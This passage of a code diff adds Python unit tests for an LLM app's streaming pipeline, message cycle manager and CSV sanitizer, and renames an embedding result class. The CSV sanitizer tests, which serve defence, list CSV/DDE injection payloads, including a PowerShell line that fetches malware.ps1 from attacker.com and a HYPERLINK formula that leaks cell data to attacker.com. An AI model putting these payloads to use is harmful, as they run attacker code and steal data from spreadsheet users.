core.app.task_pipeline.easy_ui_based_generate_task_pipeline import EasyUIBasedGenerateTaskPipeline +from core.base.tts import AppGeneratorTTSPublisher +from core.model_runtime.entities.llm_entities import LLMResult as RuntimeLLMResult +from core.model_runtime.entities.message_entities import TextPromptMessageContent +from core.ops.ops_trace_manager import TraceQueueManager +from models.model import AppMode + + +class TestEasyUIBasedGenerateTaskPipelineProcessStreamResponse: + """Test cases for EasyUIBasedGenerateTaskPipeline._process_stream_response method.""" + + @pytest.fixture + def mock_application_generate_entity(self): + """Create a mock application generate entity.""" + entity = Mock(spec=ChatAppGenerateEntity) + entity.task_id = "test-task-id" + entity.app_id = "test-app-id" + # minimal app_config used by pipeline internals + entity.app_config = SimpleNamespace( + tenant_id="test-tenant-id", + app_id="test-app-id", + app_mode=AppMode.CHAT, + app_model_config_dict={}, + additional_features=None, + sensitive_word_avoidance=None, + ) + # minimal model_conf for LLMResult init + entity.model_conf = SimpleNamespace( + model="test-model", + provider_model_bundle=SimpleNamespace(model_type_instance=Mock()), + credentials={}, + ) + return entity + + @pytest.fixture + def mock_queue_manager(self): + """Create a mock queue manager.""" + manager = Mock(spec=AppQueueManager) + return manager + + @pytest.fixture + def mock_message_cycle_manager(self): + """Create a mock message cycle manager.""" + manager = Mock() + manager.get_message_event_type.return_value = StreamEvent.MESSAGE + manager.message_to_stream_response.return_value = Mock(spec=MessageStreamResponse) + manager.message_file_to_stream_response.return_value = Mock(spec=MessageFileStreamResponse) + manager.message_replace_to_stream_response.return_value = Mock(spec=MessageReplaceStreamResponse) + manager.handle_retriever_resources = Mock() + manager.handle_annotation_reply.return_value = None + return manager + + @pytest.fixture + def mock_conversation(self): + """Create a mock conversation.""" + conversation = Mock() + conversation.id = "test-conversation-id" + conversation.mode = "chat" + return conversation + + @pytest.fixture + def mock_message(self): + """Create a mock message.""" + message = Mock() + message.id = "test-message-id" + message.created_at = Mock() + message.created_at.timestamp.return_value = 1234567890 + return message + + @pytest.fixture + def mock_task_state(self): + """Create a mock task state.""" + task_state = Mock(spec=EasyUITaskState) + + # Create LLM result mock + llm_result = Mock(spec=RuntimeLLMResult) + llm_result.prompt_messages = [] + llm_result.message = Mock() + llm_result.message.content = "" + + task_state.llm_result = llm_result + task_state.answer = "" + + return task_state + + @pytest.fixture + def pipeline( + self, + mock_application_generate_entity, + mock_queue_manager, + mock_conversation, + mock_message, + mock_message_cycle_manager, + mock_task_state, + ): + """Create an EasyUIBasedGenerateTaskPipeline instance with mocked dependencies.""" + with patch( + "core.app.task_pipeline.easy_ui_based_generate_task_pipeline.EasyUITaskState", return_value=mock_task_state + ): + pipeline = EasyUIBasedGenerateTaskPipeline( + application_generate_entity=mock_application_generate_entity, + queue_manager=mock_queue_manager, + conversation=mock_conversation, + message=mock_message, + stream=True, + ) + pipeline._message_cycle_manager = mock_message_cycle_manager + pipeline._task_state = mock_task_state + return pipeline + + def test_get_message_event_type_called_once_when_first_llm_chunk_arrives( + self, pipeline, mock_message_cycle_manager + ): + """Expect get_message_event_type to be called when processing the first LLM chunk event.""" + # Setup a minimal LLM chunk event + chunk = Mock() + chunk.delta.message.content = "hi" + chunk.prompt_messages = [] + llm_chunk_event = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event.chunk = chunk + mock_queue_message = Mock() + mock_queue_message.event = llm_chunk_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + # Execute + list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + mock_message_cycle_manager.get_message_event_type.assert_called_once_with(message_id="test-message-id") + + def test_llm_chunk_event_with_text_content(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling of LLM chunk events with text content.""" + # Setup + chunk = Mock() + chunk.delta.message.content = "Hello, world!" + chunk.prompt_messages = [] + + llm_chunk_event = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event.chunk = chunk + + mock_queue_message = Mock() + mock_queue_message.event = llm_chunk_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + mock_message_cycle_manager.get_message_event_type.return_value = StreamEvent.MESSAGE + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + mock_message_cycle_manager.message_to_stream_response.assert_called_once_with( + answer="Hello, world!", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) + assert mock_task_state.llm_result.message.content == "Hello, world!" + + def test_llm_chunk_event_with_list_content(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling of LLM chunk events with list content.""" + # Setup + text_content = Mock(spec=TextPromptMessageContent) + text_content.data = "Hello" + + chunk = Mock() + chunk.delta.message.content = [text_content, " world!"] + chunk.prompt_messages = [] + + llm_chunk_event = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event.chunk = chunk + + mock_queue_message = Mock() + mock_queue_message.event = llm_chunk_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + mock_message_cycle_manager.get_message_event_type.return_value = StreamEvent.MESSAGE + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + mock_message_cycle_manager.message_to_stream_response.assert_called_once_with( + answer="Hello world!", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) + assert mock_task_state.llm_result.message.content == "Hello world!" + + def test_agent_message_event(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling of agent message events.""" + # Setup + chunk = Mock() + chunk.delta.message.content = "Agent response" + + agent_message_event = Mock(spec=QueueAgentMessageEvent) + agent_message_event.chunk = chunk + + mock_queue_message = Mock() + mock_queue_message.event = agent_message_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + # Ensure method under assertion is a mock to track calls + pipeline._agent_message_to_stream_response = Mock(return_value=Mock()) + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + # Agent messages should use _agent_message_to_stream_response + pipeline._agent_message_to_stream_response.assert_called_once_with( + answer="Agent response", message_id="test-message-id" + ) + + def test_message_end_event(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling of message end events.""" + # Setup + llm_result = Mock(spec=RuntimeLLMResult) + llm_result.message = Mock() + llm_result.message.content = "Final response" + + message_end_event = Mock(spec=QueueMessageEndEvent) + message_end_event.llm_result = llm_result + + mock_queue_message = Mock() + mock_queue_message.event = message_end_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline._save_message = Mock() + pipeline._message_end_to_stream_response = Mock(return_value=Mock(spec=MessageEndStreamResponse)) + + # Patch db.engine used inside pipeline for session creation + with patch( + "core.app.task_pipeline.easy_ui_based_generate_task_pipeline.db", new=SimpleNamespace(engine=Mock()) + ): + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + assert mock_task_state.llm_result == llm_result + pipeline._save_message.assert_called_once() + pipeline._message_end_to_stream_response.assert_called_once() + + def test_error_event(self, pipeline): + """Test handling of error events.""" + # Setup + error_event = Mock(spec=QueueErrorEvent) + error_event.error = Exception("Test error") + + mock_queue_message = Mock() + mock_queue_message.event = error_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline.handle_error = Mock(return_value=Exception("Test error")) + pipeline.error_to_stream_response = Mock(return_value=Mock(spec=ErrorStreamResponse)) + + # Patch db.engine used inside pipeline for session creation + with patch( + "core.app.task_pipeline.easy_ui_based_generate_task_pipeline.db", new=SimpleNamespace(engine=Mock()) + ): + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + pipeline.handle_error.assert_called_once() + pipeline.error_to_stream_response.assert_called_once() + + def test_ping_event(self, pipeline): + """Test handling of ping events.""" + # Setup + ping_event = Mock(spec=QueuePingEvent) + + mock_queue_message = Mock() + mock_queue_message.event = ping_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline.ping_stream_response = Mock(return_value=Mock(spec=PingStreamResponse)) + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + pipeline.ping_stream_response.assert_called_once() + + def test_file_event(self, pipeline, mock_message_cycle_manager): + """Test handling of file events.""" + # Setup + file_event = Mock(spec=QueueMessageFileEvent) + file_event.message_file_id = "file-id" + + mock_queue_message = Mock() + mock_queue_message.event = file_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + file_response = Mock(spec=MessageFileStreamResponse) + mock_message_cycle_manager.message_file_to_stream_response.return_value = file_response + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 1 + assert responses[0] == file_response + mock_message_cycle_manager.message_file_to_stream_response.assert_called_once_with(file_event) + + def test_publisher_is_called_with_messages(self, pipeline): + """Test that publisher publishes messages when provided.""" + # Setup + publisher = Mock(spec=AppGeneratorTTSPublisher) + + ping_event = Mock(spec=QueuePingEvent) + mock_queue_message = Mock() + mock_queue_message.event = ping_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline.ping_stream_response = Mock(return_value=Mock(spec=PingStreamResponse)) + + # Execute + list(pipeline._process_stream_response(publisher=publisher, trace_manager=None)) + + # Assert + # Called once with message and once with None at the end + assert publisher.publish.call_count == 2 + publisher.publish.assert_any_call(mock_queue_message) + publisher.publish.assert_any_call(None) + + def test_trace_manager_passed_to_save_message(self, pipeline): + """Test that trace manager is passed to _save_message.""" + # Setup + trace_manager = Mock(spec=TraceQueueManager) + + message_end_event = Mock(spec=QueueMessageEndEvent) + message_end_event.llm_result = None + + mock_queue_message = Mock() + mock_queue_message.event = message_end_event + pipeline.queue_manager.listen.return_value = [mock_queue_message] + + pipeline._save_message = Mock() + pipeline._message_end_to_stream_response = Mock(return_value=Mock(spec=MessageEndStreamResponse)) + + # Patch db.engine used inside pipeline for session creation + with patch( + "core.app.task_pipeline.easy_ui_based_generate_task_pipeline.db", new=SimpleNamespace(engine=Mock()) + ): + # Execute + list(pipeline._process_stream_response(publisher=None, trace_manager=trace_manager)) + + # Assert + pipeline._save_message.assert_called_once_with(session=ANY, trace_manager=trace_manager) + + def test_multiple_events_sequence(self, pipeline, mock_message_cycle_manager, mock_task_state): + """Test handling multiple events in sequence.""" + # Setup + chunk1 = Mock() + chunk1.delta.message.content = "Hello" + chunk1.prompt_messages = [] + + chunk2 = Mock() + chunk2.delta.message.content = " world!" + chunk2.prompt_messages = [] + + llm_chunk_event1 = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event1.chunk = chunk1 + + ping_event = Mock(spec=QueuePingEvent) + + llm_chunk_event2 = Mock(spec=QueueLLMChunkEvent) + llm_chunk_event2.chunk = chunk2 + + mock_queue_messages = [ + Mock(event=llm_chunk_event1), + Mock(event=ping_event), + Mock(event=llm_chunk_event2), + ] + pipeline.queue_manager.listen.return_value = mock_queue_messages + + mock_message_cycle_manager.get_message_event_type.return_value = StreamEvent.MESSAGE + pipeline.ping_stream_response = Mock(return_value=Mock(spec=PingStreamResponse)) + + # Execute + responses = list(pipeline._process_stream_response(publisher=None, trace_manager=None)) + + # Assert + assert len(responses) == 3 + assert mock_task_state.llm_result.message.content == "Hello world!" + + # Verify calls to message_to_stream_response + assert mock_message_cycle_manager.message_to_stream_response.call_count == 2 + mock_message_cycle_manager.message_to_stream_response.assert_any_call( + answer="Hello", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) + mock_message_cycle_manager.message_to_stream_response.assert_any_call( + answer=" world!", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) diff --git a/api/tests/unit_tests/core/app/task_pipeline/test_message_cycle_manager_optimization.py b/api/tests/unit_tests/core/app/task_pipeline/test_message_cycle_manager_optimization.py new file mode 100644 index 0000000000..5ef7f0d7f4 --- /dev/null +++ b/api/tests/unit_tests/core/app/task_pipeline/test_message_cycle_manager_optimization.py @@ -0,0 +1,166 @@ +"""Unit tests for the message cycle manager optimization.""" + +from types import SimpleNamespace +from unittest.mock import ANY, Mock, patch + +import pytest +from flask import current_app + +from core.app.entities.task_entities import MessageStreamResponse, StreamEvent +from core.app.task_pipeline.message_cycle_manager import MessageCycleManager + + +class TestMessageCycleManagerOptimization: + """Test cases for the message cycle manager optimization that prevents N+1 queries.""" + + @pytest.fixture + def mock_application_generate_entity(self): + """Create a mock application generate entity.""" + entity = Mock() + entity.task_id = "test-task-id" + return entity + + @pytest.fixture + def message_cycle_manager(self, mock_application_generate_entity): + """Create a message cycle manager instance.""" + task_state = Mock() + return MessageCycleManager(application_generate_entity=mock_application_generate_entity, task_state=task_state) + + def test_get_message_event_type_with_message_file(self, message_cycle_manager): + """Test get_message_event_type returns MESSAGE_FILE when message has files.""" + with ( + patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class, + patch("core.app.task_pipeline.message_cycle_manager.db", new=SimpleNamespace(engine=Mock())), + ): + # Setup mock session and message file + mock_session = Mock() + mock_session_class.return_value.__enter__.return_value = mock_session + + mock_message_file = Mock() + # Current implementation uses session.query(...).scalar() + mock_session.query.return_value.scalar.return_value = mock_message_file + + # Execute + with current_app.app_context(): + result = message_cycle_manager.get_message_event_type("test-message-id") + + # Assert + assert result == StreamEvent.MESSAGE_FILE + mock_session.query.return_value.scalar.assert_called_once() + + def test_get_message_event_type_without_message_file(self, message_cycle_manager): + """Test get_message_event_type returns MESSAGE when message has no files.""" + with ( + patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class, + patch("core.app.task_pipeline.message_cycle_manager.db", new=SimpleNamespace(engine=Mock())), + ): + # Setup mock session and no message file + mock_session = Mock() + mock_session_class.return_value.__enter__.return_value = mock_session + # Current implementation uses session.query(...).scalar() + mock_session.query.return_value.scalar.return_value = None + + # Execute + with current_app.app_context(): + result = message_cycle_manager.get_message_event_type("test-message-id") + + # Assert + assert result == StreamEvent.MESSAGE + mock_session.query.return_value.scalar.assert_called_once() + + def test_message_to_stream_response_with_precomputed_event_type(self, message_cycle_manager): + """MessageCycleManager.message_to_stream_response expects a valid event_type; callers should precompute it.""" + with ( + patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class, + patch("core.app.task_pipeline.message_cycle_manager.db", new=SimpleNamespace(engine=Mock())), + ): + # Setup mock session and message file + mock_session = Mock() + mock_session_class.return_value.__enter__.return_value = mock_session + + mock_message_file = Mock() + # Current implementation uses session.query(...).scalar() + mock_session.query.return_value.scalar.return_value = mock_message_file + + # Execute: compute event type once, then pass to message_to_stream_response + with current_app.app_context(): + event_type = message_cycle_manager.get_message_event_type("test-message-id") + result = message_cycle_manager.message_to_stream_response( + answer="Hello world", message_id="test-message-id", event_type=event_type + ) + + # Assert + assert isinstance(result, MessageStreamResponse) + assert result.answer == "Hello world" + assert result.id == "test-message-id" + assert result.event == StreamEvent.MESSAGE_FILE + mock_session.query.return_value.scalar.assert_called_once() + + def test_message_to_stream_response_with_event_type_skips_query(self, message_cycle_manager): + """Test that message_to_stream_response skips database query when event_type is provided.""" + with patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class: + # Execute with event_type provided + result = message_cycle_manager.message_to_stream_response( + answer="Hello world", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) + + # Assert + assert isinstance(result, MessageStreamResponse) + assert result.answer == "Hello world" + assert result.id == "test-message-id" + assert result.event == StreamEvent.MESSAGE + # Should not query database when event_type is provided + mock_session_class.assert_not_called() + + def test_message_to_stream_response_with_from_variable_selector(self, message_cycle_manager): + """Test message_to_stream_response with from_variable_selector parameter.""" + result = message_cycle_manager.message_to_stream_response( + answer="Hello world", + message_id="test-message-id", + from_variable_selector=["var1", "var2"], + event_type=StreamEvent.MESSAGE, + ) + + assert isinstance(result, MessageStreamResponse) + assert result.answer == "Hello world" + assert result.id == "test-message-id" + assert result.from_variable_selector == ["var1", "var2"] + assert result.event == StreamEvent.MESSAGE + + def test_optimization_usage_example(self, message_cycle_manager): + """Test the optimization pattern that should be used by callers.""" + # Step 1: Get event type once (this queries database) + with ( + patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class, + patch("core.app.task_pipeline.message_cycle_manager.db", new=SimpleNamespace(engine=Mock())), + ): + mock_session = Mock() + mock_session_class.return_value.__enter__.return_value = mock_session + # Current implementation uses session.query(...).scalar() + mock_session.query.return_value.scalar.return_value = None # No files + with current_app.app_context(): + event_type = message_cycle_manager.get_message_event_type("test-message-id") + + # Should query database once + mock_session_class.assert_called_once_with(ANY, expire_on_commit=False) + assert event_type == StreamEvent.MESSAGE + + # Step 2: Use event_type for multiple calls (no additional queries) + with patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class: + mock_session_class.return_value.__enter__.return_value = Mock() + + chunk1_response = message_cycle_manager.message_to_stream_response( + answer="Chunk 1", message_id="test-message-id", event_type=event_type + ) + + chunk2_response = message_cycle_manager.message_to_stream_response( + answer="Chunk 2", message_id="test-message-id", event_type=event_type + ) + + # Should not query database again + mock_session_class.assert_not_called() + + assert chunk1_response.event == StreamEvent.MESSAGE + assert chunk2_response.event == StreamEvent.MESSAGE + assert chunk1_response.answer == "Chunk 1" + assert chunk2_response.answer == "Chunk 2" diff --git a/api/tests/unit_tests/core/helper/test_csv_sanitizer.py b/api/tests/unit_tests/core/helper/test_csv_sanitizer.py new file mode 100644 index 0000000000..443c2824d5 --- /dev/null +++ b/api/tests/unit_tests/core/helper/test_csv_sanitizer.py @@ -0,0 +1,151 @@ +"""Unit tests for CSV sanitizer.""" + +from core.helper.csv_sanitizer import CSVSanitizer + + +class TestCSVSanitizer: + """Test cases for CSV sanitization to prevent formula injection attacks.""" + + def test_sanitize_formula_equals(self): + """Test sanitizing values starting with = (most common formula injection).""" + assert CSVSanitizer.sanitize_value("=cmd|'/c calc'!A0") == "'=cmd|'/c calc'!A0" + assert CSVSanitizer.sanitize_value("=SUM(A1:A10)") == "'=SUM(A1:A10)" + assert CSVSanitizer.sanitize_value("=1+1") == "'=1+1" + assert CSVSanitizer.sanitize_value("=@SUM(1+1)") == "'=@SUM(1+1)" + + def test_sanitize_formula_plus(self): + """Test sanitizing values starting with + (plus formula injection).""" + assert CSVSanitizer.sanitize_value("+1+1+cmd|'/c calc") == "'+1+1+cmd|'/c calc" + assert CSVSanitizer.sanitize_value("+123") == "'+123" + assert CSVSanitizer.sanitize_value("+cmd|'/c calc'!A0") == "'+cmd|'/c calc'!A0" + + def test_sanitize_formula_minus(self): + """Test sanitizing values starting with - (minus formula injection).""" + assert CSVSanitizer.sanitize_value("-2+3+cmd|'/c calc") == "'-2+3+cmd|'/c calc" + assert CSVSanitizer.sanitize_value("-456") == "'-456" + assert CSVSanitizer.sanitize_value("-cmd|'/c notepad") == "'-cmd|'/c notepad" + + def test_sanitize_formula_at(self): + """Test sanitizing values starting with @ (at-sign formula injection).""" + assert CSVSanitizer.sanitize_value("@SUM(1+1)*cmd|'/c calc") == "'@SUM(1+1)*cmd|'/c calc" + assert CSVSanitizer.sanitize_value("@AVERAGE(1,2,3)") == "'@AVERAGE(1,2,3)" + + def test_sanitize_formula_tab(self): + """Test sanitizing values starting with tab character.""" + assert CSVSanitizer.sanitize_value("\t=1+1") == "'\t=1+1" + assert CSVSanitizer.sanitize_value("\tcalc") == "'\tcalc" + + def test_sanitize_formula_carriage_return(self): + """Test sanitizing values starting with carriage return.""" + assert CSVSanitizer.sanitize_value("\r=1+1") == "'\r=1+1" + assert CSVSanitizer.sanitize_value("\rcmd") == "'\rcmd" + + def test_sanitize_safe_values(self): + """Test that safe values are not modified.""" + assert CSVSanitizer.sanitize_value("Hello World") == "Hello World" + assert CSVSanitizer.sanitize_value("123") == "123" + assert CSVSanitizer.sanitize_value("test@example.com") == "test@example.com" + assert CSVSanitizer.sanitize_value("Normal text") == "Normal text" + assert CSVSanitizer.sanitize_value("Question: How are you?") == "Question: How are you?" + + def test_sanitize_safe_values_with_special_chars_in_middle(self): + """Test that special characters in the middle are not escaped.""" + assert CSVSanitizer.sanitize_value("A = B + C") == "A = B + C" + assert CSVSanitizer.sanitize_value("Price: $10 + $20") == "Price: $10 + $20" + assert CSVSanitizer.sanitize_value("Email: user@domain.com") == "Email: user@domain.com" + + def test_sanitize_empty_values(self): + """Test handling of empty values.""" + assert CSVSanitizer.sanitize_value("") == "" + assert CSVSanitizer.sanitize_value(None) == "" + + def test_sanitize_numeric_types(self): + """Test handling of numeric types.""" + assert CSVSanitizer.sanitize_value(123) == "123" + assert CSVSanitizer.sanitize_value(456.789) == "456.789" + assert CSVSanitizer.sanitize_value(0) == "0" + # Negative numbers should be escaped (start with -) + assert CSVSanitizer.sanitize_value(-123) == "'-123" + + def test_sanitize_boolean_types(self): + """Test handling of boolean types.""" + assert CSVSanitizer.sanitize_value(True) == "True" + assert CSVSanitizer.sanitize_value(False) == "False" + + def test_sanitize_dict_with_specific_fields(self): + """Test sanitizing specific fields in a dictionary.""" + data = { + "question": "=1+1", + "answer": "+cmd|'/c calc", + "safe_field": "Normal text", + "id": "12345", + } + sanitized = CSVSanitizer.sanitize_dict(data, ["question", "answer"]) + + assert sanitized["question"] == "'=1+1" + assert sanitized["answer"] == "'+cmd|'/c calc" + assert sanitized["safe_field"] == "Normal text" + assert sanitized["id"] == "12345" + + def test_sanitize_dict_all_string_fields(self): + """Test sanitizing all string fields when no field list provided.""" + data = { + "question": "=1+1", + "answer": "+calc", + "id": 123, # Not a string, should be ignored + } + sanitized = CSVSanitizer.sanitize_dict(data, None) + + assert sanitized["question"] == "'=1+1" + assert sanitized["answer"] == "'+calc" + assert sanitized["id"] == 123 # Unchanged + + def test_sanitize_dict_with_missing_fields(self): + """Test that missing fields in dict don't cause errors.""" + data = {"question": "=1+1"} + sanitized = CSVSanitizer.sanitize_dict(data, ["question", "nonexistent_field"]) + + assert sanitized["question"] == "'=1+1" + assert "nonexistent_field" not in sanitized + + def test_sanitize_dict_creates_copy(self): + """Test that sanitize_dict creates a copy and doesn't modify original.""" + original = {"question": "=1+1", "answer": "Normal"} + sanitized = CSVSanitizer.sanitize_dict(original, ["question"]) + + assert original["question"] == "=1+1" # Original unchanged + assert sanitized["question"] == "'=1+1" # Copy sanitized + + def test_real_world_csv_injection_payloads(self): + """Test against real-world CSV injection attack payloads.""" + # Common DDE (Dynamic Data Exchange) attack payloads + payloads = [ + "=cmd|'/c calc'!A0", + "=cmd|'/c notepad'!A0", + "+cmd|'/c powershell IEX(wget attacker.com/malware.ps1)'", + "-2+3+cmd|'/c calc'", + "@SUM(1+1)*cmd|'/c calc'", + "=1+1+cmd|'/c calc'", + '=HYPERLINK("http://attacker.com?leak="&A1&A2,"Click here")', + ] + + for payload in payloads: + result = CSVSanitizer.sanitize_value(payload) + # All should be prefixed with single quote + assert result.startswith("'"), f"Payload not sanitized: {payload}" + assert result == f"'{payload}", f"Unexpected sanitization for: {payload}" + + def test_multiline_strings(self): + """Test handling of multiline strings.""" + multiline = "Line 1\nLine 2\nLine 3" + assert CSVSanitizer.sanitize_value(multiline) == multiline + + multiline_with_formula = "=SUM(A1)\nLine 2" + assert CSVSanitizer.sanitize_value(multiline_with_formula) == f"'{multiline_with_formula}" + + def test_whitespace_only_strings(self): + """Test handling of whitespace-only strings.""" + assert CSVSanitizer.sanitize_value(" ") == " " + assert CSVSanitizer.sanitize_value("\n\n") == "\n\n" + # Tab at start should be escaped + assert CSVSanitizer.sanitize_value("\t ") == "'\t " diff --git a/api/tests/unit_tests/core/rag/embedding/test_embedding_service.py b/api/tests/unit_tests/core/rag/embedding/test_embedding_service.py index d9f6dcc43c..025a0d8d70 100644 --- a/api/tests/unit_tests/core/rag/embedding/test_embedding_service.py +++ b/api/tests/unit_tests/core/rag/embedding/test_embedding_service.py @@ -53,7 +53,7 @@ from sqlalchemy.exc import IntegrityError from core.entities.embedding_type import EmbeddingInputType from core.model_runtime.entities.model_entities import ModelPropertyKey -from core.model_runtime.entities.text_embedding_entities import EmbeddingUsage, TextEmbeddingResult +from core.model_runtime.entities.text_embedding_entities import EmbeddingResult, EmbeddingUsage from core.model_runtime.errors.invoke import ( InvokeAuthorizationError, InvokeConnectionError, @@ -99,10 +99,10 @@ class TestCacheEmbeddingDocuments: @pytest.fixture def sample_embedding_result(self): - """Create a sample TextEmbeddingResult for testing. + """Create a sample EmbeddingResult for testing. Returns: - TextEmbeddingResult: Mock embedding result with proper structure + EmbeddingResult: Mock embedding result with proper structure """ # Create normalized embedding vectors (dimension 1536 for ada-002) embedding_vector = np.random.randn(1536) @@ -118,7 +118,7 @@ class TestCacheEmbeddingDocuments: latency=0.5, ) - return TextEmbeddingResult( + return EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized_vector], usage=usage, @@ -197,7 +197,7 @@ class TestCacheEmbeddingDocuments: latency=0.8, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, usage=usage, @@ -296,7 +296,7 @@ class TestCacheEmbeddingDocuments: latency=0.6, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=new_embeddings, usage=usage, @@ -386,7 +386,7 @@ class TestCacheEmbeddingDocuments: latency=0.5, ) - return TextEmbeddingResult( + return EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, usage=usage, @@ -449,7 +449,7 @@ class TestCacheEmbeddingDocuments: latency=0.5, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=[valid_vector.tolist(), nan_vector], usage=usage, @@ -629,7 +629,7 @@ class TestCacheEmbeddingQuery: latency=0.3, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized], usage=usage, @@ -728,7 +728,7 @@ class TestCacheEmbeddingQuery: latency=0.3, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=[nan_vector], usage=usage, @@ -793,7 +793,7 @@ class TestCacheEmbeddingQuery: latency=0.3, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized], usage=usage, @@ -873,13 +873,13 @@ class TestEmbeddingModelSwitching: latency=0.3, ) - result_ada = TextEmbeddingResult( + result_ada = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized_ada], usage=usage, ) - result_3_small = TextEmbeddingResult( + result_3_small = EmbeddingResult( model="text-embedding-3-small", embeddings=[normalized_3_small], usage=usage, @@ -953,13 +953,13 @@ class TestEmbeddingModelSwitching: latency=0.4, ) - result_openai = TextEmbeddingResult( + result_openai = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized_openai], usage=usage_openai, ) - result_cohere = TextEmbeddingResult( + result_cohere = EmbeddingResult( model="embed-english-v3.0", embeddings=[normalized_cohere], usage=usage_cohere, @@ -1042,7 +1042,7 @@ class TestEmbeddingDimensionValidation: latency=0.7, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, usage=usage, @@ -1095,7 +1095,7 @@ class TestEmbeddingDimensionValidation: latency=0.5, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, usage=usage, @@ -1148,7 +1148,7 @@ class TestEmbeddingDimensionValidation: latency=0.3, ) - result_ada = TextEmbeddingResult( + result_ada = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized_ada], usage=usage_ada, @@ -1181,7 +1181,7 @@ class TestEmbeddingDimensionValidation: latency=0.4, ) - result_cohere = TextEmbeddingResult( + result_cohere = EmbeddingResult( model="embed-english-v3.0", embeddings=[normalized_cohere], usage=usage_cohere, @@ -1279,7 +1279,7 @@ class TestEmbeddingEdgeCases: latency=0.1, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized], usage=usage, @@ -1322,7 +1322,7 @@ class TestEmbeddingEdgeCases: latency=1.5, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized], usage=usage, @@ -1370,7 +1370,7 @@ class TestEmbeddingEdgeCases: latency=0.5, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, usage=usage, @@ -1422,7 +1422,7 @@ class TestEmbeddingEdgeCases: latency=0.2, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, usage=usage, @@ -1478,7 +1478,7 @@ class TestEmbeddingEdgeCases: ) # Model returns embeddings for all texts - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, usage=usage, @@ -1546,7 +1546,7 @@ class TestEmbeddingEdgeCases: latency=0.8, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, usage=usage, @@ -1603,7 +1603,7 @@ class TestEmbeddingEdgeCases: latency=0.3, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized], usage=usage, @@ -1657,7 +1657,7 @@ class TestEmbeddingEdgeCases: latency=0.5, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, usage=usage, @@ -1757,7 +1757,7 @@ class TestEmbeddingCachePerformance: latency=0.3, ) - embedding_result = TextEmbeddingResult( + embedding_result = EmbeddingResult( model="text-embedding-ada-002", embeddings=[normalized], usage=usage, @@ -1826,7 +1826,7 @@ class TestEmbeddingCachePerformance: latency=0.5, ) - return TextEmbeddingResult( + return EmbeddingResult( model="text-embedding-ada-002", embeddings=embeddings, 